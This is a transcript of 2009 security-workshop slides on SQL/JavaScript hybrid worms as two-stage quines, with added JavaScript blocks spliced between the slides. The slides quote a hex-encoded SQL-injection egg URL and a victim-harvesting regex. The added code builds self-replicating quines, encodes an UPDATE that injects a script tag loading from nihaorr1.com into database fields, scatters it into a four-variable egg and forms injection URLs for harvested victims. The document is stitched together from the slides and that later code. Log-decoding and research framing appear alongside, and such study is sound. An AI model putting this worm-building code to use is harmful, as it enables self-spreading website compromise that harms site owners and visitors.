August 26th, 2009
TRANSCRIPT
8/14/2019 August 26th, 2009
1/13
Page 1 - CONFIDENTIAL -
SQL/JavaScript Hybrid Worms As Two-stage Quines
Workshop Seguridad Informática 2009, 38 JAIIO (MDQ)
Lic. José Orlicki (jorlicki@)
August 26th, 2009
Page 2
Not-So-Secret Agenda
- Motivation
- Hybrid Scenario
- Features Discussion
- Proof of Concept Highlights
- Demo & Discussion!?

Abstract: a what-if worm scenario, based on real SQL/JS incidents and prototype code, leads to a proof of concept in the laboratory built on widely-deployed (unhardened) technologies. It helps anticipate future trends and protections.
- DECLASSIFIED -
Page 3 - CONFIDENTIAL -
Attacks in the Wild! (2008)
[..] Anyone know about www.nihaorr1.com/1.js? The db that supports our company's ecommerce is filling up with this url [..]
[..] The script www.nihaorr1.com/1.js is getting inserted into every record of my organization's SQL db. I'm the accidental techie in my office, and I'm clueless [..]
"Huge Web Hack Attack Infects Many Pages", Gregg Keizer, Computerworld (nihaorr1 -> favorite search engine)
Page 4
Prototype of infected RFIDs! (2006)
"Is Your Cat Infected with a Computer Virus?", Melanie R. Rieback, Bruno Crispo, Andrew S. Tanenbaum.
SQL virus prototype propagating via RFID tags (virus != worm?). Uses SQL quines, i.e. self-replicating statements.
Page 6
Basic Quines in T-SQL and JavaScript
Version 1: quine using classic techniques in T-SQL
- NOT CONFIDENTIAL -
Page 7
Basic Quines in T-SQL and JavaScript
Version 2: quine using the native reflection hack in T-SQL
- NOT CONFIDENTIAL -
Page 8
Basic Quines in T-SQL and JavaScript
Version 3 (fail!): quine using classic and native getElementById() techniques in JavaScript
- Similar to Version 1, but on the JS/client side
- Similar to Version 2, but idem
- NOT CONFIDENTIAL -
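Added example, not code from the slides and not the author's T-SQL: the two quine techniques Versions 1 to 3 refer to (classic "data plus quoted data" and native reflection), written in JavaScript, followed by a two-stage pair in which each stage emits the other, which is the shape a SQL/JS worm needs when the SQL egg must carry the JS stage and the JS stage must re-emit the SQL egg. Function.prototype.toString stands in for the T-SQL reflection hack and for getElementById().innerHTML, which the slides name but do not show; that substitution, and the stage names "SQL"/"JS", are this example's assumptions. Each program is a function body, and isQuine() is the byte-exact check a practitioner wants before trusting a payload to replicate.

```javascript
// Added example (not the slides' code). Programs are function bodies; runProgram()
// evaluates one and returns whatever it returns, so output can be compared
// byte-for-byte with source.
function runProgram(src) {
  return new Function(src)();
}

// A program is a quine when its output equals its own source exactly.
// One changed byte anywhere breaks replication, which is why the worm's egg
// must survive hex/URL encoding unmodified.
function isQuine(src) {
  return runProgram(src) === src;
}

// Version 1 technique (classic): the program keeps its own tail as data `s`
// and outputs the quoted form of `s` followed by `s` itself. JSON.stringify
// does the quoting, the step hand-written quines usually get wrong.
const CLASSIC_TAIL = 'return "var s = " + JSON.stringify(s) + "; " + s;';
const CLASSIC_QUINE = "var s = " + JSON.stringify(CLASSIC_TAIL) + "; " + CLASSIC_TAIL;

// Version 2 technique (reflection): no data copy at all; the code reads its own
// text back through Function.prototype.toString (assumed here as the JS analogue
// of the T-SQL reflection hack and of getElementById().innerHTML on an inline script).
const REFLECTIVE_QUINE =
  'return (function q() { return "return (" + q.toString() + ")()"; })()';

// Two-stage quine: running stage "SQL" outputs stage "JS" and running stage "JS"
// outputs stage "SQL". Only the stage marker differs, so one shared tail serves both.
const STAGE_TAIL =
  'return "var s = " + JSON.stringify(s) + "; var stage = " + ' +
  'JSON.stringify(stage === "SQL" ? "JS" : "SQL") + "; " + s;';

function stageProgram(stage) {
  return (
    "var s = " + JSON.stringify(STAGE_TAIL) +
    "; var stage = " + JSON.stringify(stage) + "; " + STAGE_TAIL
  );
}

// True when a yields b, b yields a again, and the two stages really differ,
// i.e. the pair closes the two-stage replication loop.
function isTwoStageQuine(a, b) {
  return a !== b && runProgram(a) === b && runProgram(b) === a;
}

console.log("classic quine:", isQuine(CLASSIC_QUINE));
console.log("reflective quine:", isQuine(REFLECTIVE_QUINE));
console.log("two-stage pair:", isTwoStageQuine(stageProgram("SQL"), stageProgram("JS")));
```

Neither stage of the pair is a quine on its own (each outputs the other stage), which is the point of the two-stage construction: the SQL egg does not need to reproduce itself directly, only the JS stage that will inject it again.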
Page 9 - CONFIDENTIAL -
Proof of Concept
Lab:
1. CherryPy,
2. Two ad-hoc-vulnerable webapps in different domains,
3. MS-SQL,
4. Python SQL interface, no modifications.
Two-stage self-replication. Targets VARCHAR and TEXT db fields, ALL TABLES.
Version 1: MS-SQL quines, JavaScript regexes to extract new possible victim URLs, blind injection (7359 bytes of SQLi egg).
Version 2: MS-SQL reflective features (approx. 3000 bytes, idem).
Version 3 (fail!): JavaScript quines and reflection worked, the complete worm didn't (estimated 1500 bytes).
Page 10
Proof of Concept (cont.)
SQL hex and URL encoding: stealthiness and SQLi correctness. 4-variable scattered egg (the 2008 original used 1 variable):
http://192.168.1.105:8081/greetUser?numid=1%3BDECLARE+@S+VARCHAR(MAX),@S2+VARCHAR(MAX),@S3+VARCHAR(MAX),@S4+VARCHAR(MAX)%3BSET+@S=CAST(0x0d0a444398498468...
Regex matching for detecting possible new victim sites:
var regexp = new RegExp("[a-zA-Z0-9.?_&=:/-]+/[a-zA-Z0-9.?_&=-]+=[0-9]+", "g");
var m = infected_html.match(regexp);
JavaScript blind XSS for propagation (very naive!):
document.write("
);
- NOT CONFIDENTIAL -
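Added example, not the slides' code: one side builds the hex-encoded, URL-encoded, scattered T-SQL egg of the form shown above (DECLARE @S..@S4, SET @Sn=CAST(0x.. AS VARCHAR(MAX)), EXEC) and the propagation URL that carries it, using the slide's victim-URL regex; the other side, a defender reading an access log, reverses the encoding to see the statement the egg would EXEC. The stage-1 UPDATE, the infected page, the access-log line and the equal-size chunking are constructed stand-ins and assumptions of this example, not the author's prototype.

```javascript
// Added example (not the slides' code). Constructed stand-in for the stage-1
// statement: the real worm loops over every VARCHAR/TEXT column of every table,
// one column is enough to show the encoding.
const STAGE1_SQL =
  "UPDATE guestbook SET msg = msg + '<script src=http://www.nihaorr1.com/1.js></script>'";

// CAST(0x.. AS VARCHAR(MAX)) turns each byte into one character, so encode one
// byte per character and refuse anything outside the single-byte range.
function hexEncode(s) {
  let hex = "";
  for (const ch of s) {
    const c = ch.codePointAt(0);
    if (c > 0xff) throw new Error("non single-byte character cannot ride in a 0x literal");
    hex += c.toString(16).padStart(2, "0");
  }
  return hex;
}

function hexDecode(hex) {
  let s = "";
  for (let i = 0; i + 1 < hex.length; i += 2) {
    s += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return s;
}

// Scatter the statement over n variables @S, @S2, ... (the slide's 4-variable egg;
// the 2008 original used one). Chunks hold whole bytes so every CAST is well formed.
// Equal-sized chunks are this example's choice, not necessarily the author's.
function buildEgg(sql, n) {
  const hex = hexEncode(sql);
  const bytes = hex.length / 2;
  if (bytes < n) throw new Error("fewer bytes than variables");
  const names = Array.from({ length: n }, (_, i) => (i === 0 ? "@S" : "@S" + (i + 1)));
  const base = Math.floor(bytes / n);
  const extra = bytes % n;
  const sets = [];
  let pos = 0;
  names.forEach((v, i) => {
    const len = 2 * (base + (i < extra ? 1 : 0));
    sets.push("SET " + v + "=CAST(0x" + hex.slice(pos, pos + len) + " AS VARCHAR(MAX))");
    pos += len;
  });
  return "DECLARE " + names.map((v) => v + " VARCHAR(MAX)").join(",") + ";" +
    sets.join(";") + ";EXEC(" + names.join("+") + ")";
}

// Stage 2 (browser side): the slide's regex, dash moved to the end of each class
// and redundant escapes dropped, picks URLs that end in a numeric parameter.
const VICTIM_RE = /[a-zA-Z0-9.?_&=:\/-]+\/[a-zA-Z0-9.?_&=-]+=[0-9]+/g;

function findVictimUrls(html) {
  return Array.from(new Set(html.match(VICTIM_RE) || []));
}

// Terminate the numeric parameter with ";" and append the egg; spaces travel as "+"
// as on the slide ("@" and "=" are percent-encoded here, which decodes identically).
function buildInjectionUrl(victimUrl, egg) {
  return victimUrl + encodeURIComponent(";" + egg).replace(/%20/g, "+");
}

// Defender side: form-decode the logged request and decode every CAST(0x...) literal
// in order; the concatenation is what EXEC(@S+@S2+...) would have run.
function revealHexSql(logLine) {
  const decoded = decodeURIComponent(logLine.replace(/\+/g, " "));
  const hexes = [];
  const re = /CAST\(\s*0x([0-9a-fA-F]+)/g;
  let m;
  while ((m = re.exec(decoded)) !== null) hexes.push(m[1]);
  return hexDecode(hexes.join(""));
}

// Constructed infected page: two candidate victims, one URL without a numeric
// parameter (not matched) and the injected script tag itself (not matched).
const INFECTED_HTML = [
  "<p>Hello, user 1!</p>",
  '<a href="http://192.168.1.105:8081/greetUser?numid=7">next</a>',
  '<a href="http://10.0.0.2:8082/items?id=42">shop</a>',
  '<a href="/greetUser?name=bob">bob</a>',
  "<script src=http://www.nihaorr1.com/1.js></script>",
].join("\n");

// Constructed access-log line carrying the propagation request for the first victim.
function sampleLogLine() {
  const url = buildInjectionUrl(findVictimUrls(INFECTED_HTML)[0], buildEgg(STAGE1_SQL, 4));
  const path = url.replace(/^https?:\/\/[^\/]+/, "");
  return '10.0.0.9 - - [26/Aug/2009:14:02:11 -0300] "GET ' + path + ' HTTP/1.1" 200 512';
}

console.log("victims:", findVictimUrls(INFECTED_HTML));
console.log("revealed:", revealHexSql(sampleLogLine()));
```

revealHexSql() is the check worth running over real logs: a signature on the plaintext UPDATE never fires on the hex form, but decoding every CAST(0x...) literal in a request and inspecting the result does, regardless of how many variables the egg was scattered over.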
Page 11 - CONFIDENTIAL -
Hybrid Worms Discussion!
Billy Hoffman and John Terrill, "The Little Hybrid Web Worm that Could", Black Hat USA 2007 (they focus on JS obfuscation and Perl).
- No choke point.
- Stealthier infections.
- More portability (interpreted languages?)
- Targets generic vulnerabilities (idem)
- Easily obfuscated (idem)
- Fewer crashes (idem)
- Data/Web 2.0/Cloud centric?
Page 12
Demonstration!?
"...but I can only show you the door. You're the one that has to walk through it..."
Acknowledgements:
- Core Security Team: support and creative environment.
- Sebastián Cufre: T-SQL tricks.
- Aureliano Calvo: JavaScript concepts.
- Pedro Varangot: suitable testing computer.
- DECLASSIFIED -
Page 13 - CONFIDENTIAL -
Questions?
Thanks!
Contact: